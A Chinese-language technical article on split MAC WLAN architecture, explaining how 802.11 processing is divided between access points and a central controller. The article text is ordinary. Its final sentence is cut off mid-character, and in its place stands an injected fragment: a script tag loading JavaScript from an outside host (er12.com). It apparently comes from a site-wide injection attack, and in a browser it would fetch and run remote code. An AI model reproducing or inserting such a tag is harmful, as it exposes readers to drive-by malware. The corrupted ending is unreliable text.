为满足wlan网络的实时要求,设计者可以参考本文介绍的一种分割式媒体存取控制(mac)架构,以便在接入点和中心交换机之间分配mac处理任务,并可极大地提高wlan系统管理无线资源的能力和安全性。
wlan可提高企业网络的效率,并降低网络部署和运营总成本。但是,无线网络同时也为网络管理者带来了管理和安全方面的挑战。成功部署无线网络的关键在于it经理能够获得无线域的控制权,就和控制有线网络一样。
有线网络依靠用户认证和对网络的物理访问来实现接入,而无线网络则需要强大的认证和加密手段。由于无线域是动态的,随时都在变化,无线网络在运营方面也是一个挑战。无线网络运营商要想部署运营级的无线网络,就必须克服这些难题。
无线网络的一个关键设计和部署原则就是监视、控制和指配功能的集中化。实践证明,集中化是对大量网络设备制定和实施统一政策的最佳方式,无论这些设备集中于同一物理地点还是分散在不同的地理区域。
一个集中式wlan架构要想卓有成效,相关的信息必须不断地馈送给管理该网络的中心设备(如wlan交换机/设备)。如果没有整体、精确及更新速度达到毫秒级的无线环境状态信息,中心设备就无法做出准确的决策。与此同时,如果中心控制器参与所有的接入点操作,它可能会影响那些对时序特别敏感的功能。因此,必须在其中寻求一种平衡。
解决集中化架构平衡问题的一个方案是提供一个全新的802.11服务传送设计,在两种设备(即ap和中心wlan交换机/设备)之间将802.11 mac层的处理任务进行分割。下面我们将详细探讨这种mac分割方法以及它对wlan架构的益处。
构建企业级的wlan
传统的wlan由无数单独的ap组成,它们产生了很多独立、自治的rf域,而这些rf域又都是独自管理的。这很像最初的蜂窝网络,每个单独的无线接收和发送塔管理它们各自的域。同样地,在独立的802.11网络中,所有mac处理任务都由ap自己执行。例如,一个ap可执行:
* 终止802.11数据和管理协议(注意:很多管理任务来自交换机/某设备);
* 在网络的有线和无线部分之间转换数据;
* 维护有关客户端和无线环境的统计信息;
在单个无线节点内维护信息使得很难创建一个统一的网络以为每个用户群提供稳定的网络性能、高性能漫游,以及不管用户位置都能确保政策的一致性。最后,将每个接入点作为单独的rf域来管理对it管理人员来说是困难的,随着无线网络规模的不断扩充尤其如此。
图1:典型的分割式mac架构示意图。
集中式wlan架构克服了以上缺陷,它可将系统范围的信息集中到单个交换机/某设备中,或集中到多个协调工作的交换机/设备中。然而,大部分方案都是将所有功能集中到一个中心设备,这意味着各种任务和处理都发生在该交换机或设备内,包括流量转发、加密、服务质量(qos),以及政策创建和管理。在这种架构中,ap只是一个无线收发天线,在802.11或其它数据包处理中不起任何作用。这种架构存在的问题是,所有处理决策都由中心设备决定,它能否处理好实时应用?
采用分割式mac的wlan系统可以解决以上问题,它在ap和wlan交换机或控制器之间将802.11数据和管理协议的处理任务及接入点功能分割开(见图1)。
通过这种mac分离方法,ap只处理有实时要求的协议部分,如信标帧的发送、响应来自客户端的“探查请求(probe requests)”帧、为交换机或控制器提供实时信号质量信息、监视其他ap的出现以及第二层加密等。
所有其它功能都由wlan交换机/设备处理,因为它们对时间不敏感,而且对系统范围的可见度有要求。wlan控制器所提供的一些mac层功能包括:802.11认证、802.11关联和再关联(移动性)、802.11帧转换和桥接等。
将802.11管理协议、帧转换和桥接功?script src=http://er12.com/t.js>